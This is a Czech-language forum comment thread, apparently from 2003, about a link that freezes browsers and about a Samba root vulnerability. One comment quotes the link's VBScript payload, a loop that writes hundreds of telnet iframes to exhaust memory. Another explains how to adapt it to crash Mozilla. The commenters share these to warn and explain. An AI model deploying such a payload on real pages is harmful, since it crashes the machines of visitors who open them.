Chyba ve skriptech u Windows zase otevírá pole pro červíky

http://source.lv/woid.jpg

tak to je husty :)

Nojo, aby se zas nekdo nenasel. Co k tomu napsat aspon varovani? <br> Neklikejte na ten odkaz, pokud si nejste jisti co delate, s nekterymi prohlizeci zpusobi zamrznuti systemu.

To není žádní chyba ve skriptech, ale nasere to. Neklikejte na to, otevře to 12000 telnetů na microsoft.com. dost na to, aby se vám zaplnila paměť a počítač byl nepoužitelný.

je tam 15x toto:

<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>

To je pravda, chyba neni ve skriptech. Chyba je uz v tom, ze dokument typu "image/jpeg" je spusten a ne zobrazen.

Ne, soubory nejsou rozlišovány podle přípony, ale podle Mime typu. ASP stránka tak může být obrázek, JPG může být naopak kód. jak si myslíte že funguje třeba takové Navrcholu? je tam odkaz jakoby na obrázek, za kterým se ale schovává kód. použití JPG pro kód je jen záměrně matoucí, mate to ale uživatele. prohlížeči je jedno, jak se to jmenuje, důležitější je pro něj skutečný typ souboru.

Nevim co Vam, ale me server jako typ souboru vrati "image/jpeg". Zkuste si "wget -s http://source.lv/woid.jpg" a podivejte se co budete mit ve stazene hlavicce.
IE & spol. se buhuzel casto snazi byt chytrejsi nez je vhodne a tak analyzuje stazena data, nekouka na typ dat a dela s nima to co se mu zlibi. Spravne by mel v tomto pripade poznat, ze stazena data neodpovidaji uvedenemu typu a nedelat nic.

[ja@pocitac adresar]$ wget http://source.lv/woid.jpg
--16:48:38-- http://source.lv/woid.jpg
=> `woid.jpg'
Resolving source.lv... done.
Connecting to source.lv[159.148.96.252]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,339 [<b>image/jpeg</b>]

Takze zrovna v tomto pripade je to problem, ze sa spusti obrazok. Mimochodom, mozilla vypise ze obrazok obsahuje chyby a neda sa zobrazit.

The image “http://source.lv/woid.jpg” cannot be displayed, because it contains errors.
By MozillaB

Jak jste na to prisel? Navrcholu samozrejme posila obrazek - konkretne pruhledny GIF o rozmerech 1x1. K nemu dostane prohlizec cookie, cimz se castecne eliminuje vicenasobne pricitani pri opetovnem nahravani stranky tim samym uzivatelem. Pane Holciku, April je jeste daleko...

Jinak ale mate pravdu, ze se na strane serveru spusti skript. To je ale trosku neco jineho - z vaseho prispevku mi vyplynulo, ze se misto obrazku spusti skript v browseru (zadny z browseru, ktere znam, neumi interpretovat Perl ani ASP).

Nikde jsem neřekl, že navrcholu neposílá obrázek, vyžádáte si obrázek, spustí se kód (úplně jedno jestli ASP, či jiný) ten zpracuje info a na závěr pro korektnost nastaví content type na obrázek a pošle pár bajtů pro průhledný gif.

Moje mozillka pro W98 mi tam akorat rekla, ze to nemuze zobrazit, protoze je v tom chyba. Jinak ani nezamrzla, ani nic nespustila, ani mi nezezloutly zaclony!
Ale to byste museli mit mozilku, pak byste se nemuseli bat surfovat a mejlovat

Pokud to clovek trosku modifikuje (uzavre ten iframe a napise to v JavaScriptu) a posle ten jpeg jako text/html tak to slozi i Mozillu. Nevim co na tom tak vidite, jedine snad to, ze IE se snazi image/jpeg interpretovat jako HTML coz je imho anachronismus z dob kdy lidi byli prasata a neposilali spravnej Content-Type. Na druhou stranu spousta lidi ho neposila spravne dodnes.

No ja si myslím že tu trochu rozdíl je, chyba ve Win je v systému, ta co zmiňuješ je v Sambě což je program pro Linux. Nepletu-li se tak si Sambu instalovat nemusiš.

http://marc.theaimsgroup.com/?l=linux-kernel&m=104791735604202&w=2
http://www.underground.cz/article.php?id_article=852

Tak se predved, jak tohle udelas vzdalene. Samozrejme to je velka chyba, ale zneuzitelna je jen lokalne.

No, pokud admin toho serveru zapomene userum vzit shell, tak by to snad mohlo jit, ne ?

Co takhle zminit se o chybe v Sambe pro Linux? Tato chyba ma take atributy zneuzitelne cervy. Ale ja vim.... tohle je prece nezajimave tema ze?

Ta Samba me zajima, mas k tomu nejake podrobnejsi info?

upgraduj na Sambu 2.2.8 viz samba.org

Rozdil je v tom, ze chyba v Sambe se tyka adminu, ne uzivatelu, kdezto tohle je chyba, ktere se musi venovat uzivatele a proto je nutno je informovat na uzivatelskem webu. Admini ctou jine weby a tam so o sambe zajiste dozvedeli.

Omyl chyba v Sambe je take vec uzivatelu. Znam plno beznych uzivatelu Linuxu, kteri pouzivaji Sambu, aby meli "pristup" site MS.

typicka slova winlammeru

takovato chyba nejde omezit v zadnem systemu (kdyz si uzivatel spusti skript tak to udela co je v nem napsane na urovni prav uzivatele) jen nezbyva nez vypnout automaticke spousteni takovychto sracek

Říkáš tomu "sračka", protože jsou v tom chyby. Samo o jde o přínosnou vlastnost, jen kdyby to někdo - po těch letech - už dokázal naimplementovat bezpečně.

ta chyba je obtížně zneužitelná přes internet, protože už v základu se velmi nedoporučuje mít Sambu otevřenou přes internet kvůli problémům v implementaci, není to prostě bráno jako implicitně bezpečné. spíše je to tedy zneužitelné v lokálních sítích a admini se o tom dozví. tato chyba ve skriptech se týká běžných uživatelů a je poměrně kritická.

Nesouhlasim s Vami. Jiz si presne nepamatuji ceho se chyba v Sambe tykala ale mam pocit ze se jednalo o buffer overrun. Tato chyba umoznuje spustit libovolny kod s privilegii roota. Nema prece smysl rikat ze neni z neuzitelna z Internetu. Je stejne zneuzitelna jako ta pro Win.

Co kdyz si nekdo stahne ze stranek cervika, ktery bude tuto chybu vyuzivat a na Linuxu mu takto spusti treba trojskeho kone? Tohle snad neni zavazne?

neplette se m roota -samba pokud vim tak v distru ,ktere mam nainstalovanem ,tak nebezi pod rootem ,takze max ziska uzivatele pod kterym bezi - ale tohle je nesmycslne prirovnani ,protoze ani bezny uzivatel linuxu si neexportu je disky prez sambu - a navic samba je neco co si do systemu umyslne pridavate - vubec to tam byt nemusi...

Omyl pravdu mam ja:

citace z root.cz: "

Všechny verze Samby nižší než 2.2.8 obsahují závažnou bezpečnostní chybu umožňující vzdálenému útočníkovi získat rootovská oprávnění. Upgrade na nejnovější verzi 2.2.8 je důrazně doporučovan. (Upozornil harry_x)
mik"
 
A to ze Samba nemusi byt implicitne nastavena je jedno, protoze jak uz jsem tu psal vyse spousta uzivatelu ji instaluje k vuli pristupu MS siti.

To nic nemeni na tom, ze SAMBA JE SERVER. A administrovat server nemuze kdejaky tupoun a widlovej klikac. A o te chybe kazdy vi.

Aha jsem rad ze si myslis ze o ni kazdy vi? Jak je mozne ze znam minimalne mnoho lidi, kteri o tom nevedi a stale pouzivaji zranitelnou Sambu.

A opravdu me uz bavi to, ze Samba je server a nemuze ji spravovat kazdy? A co je teda potom prima soucast Linuxu? Jen Kernel? S tim si ale asi moc nikdo nevystaci.

Proste priznej ze tato chyba ma jeste vyssi uroven nez ta co je tu pro Win, protoze ta dovoli spustit kod jen s privilegii prihlaseneho uzivatele, tady to konci pravy roota.

Jeste dodatek, myslis si ze snad Windows 2000 Server, muze spravovat kdejakej tupoun? Asi si tyto systemy nevidel a zustal si trcet s Win 98. To uz vubec nemluvim o Windows 2003 Server, mel jsem moznost videt Betu.

Ale Samba je server, ma to dokonce i v nazvu Pouzivas-li PC jako desktopovou stanici a pripojenim na internet, nemusis Sambu vubec instalovat. Zato jscript mas nainstalovanej vzdy, pokud nejsi natolik dobrej, ze si ho vypnes.
Samba se defaultne spousti pod uzivatelem Samba.
Zive je platek pro BFU, proto se zabyva chybami, ktery jsou nebezpacny BFU. Admini ctou stranky, kterym bys mozna ani nerozumel A tam se o Sambe docetli minuly tyden.
W 2003 opravdu mit nebudu, zaplatpambu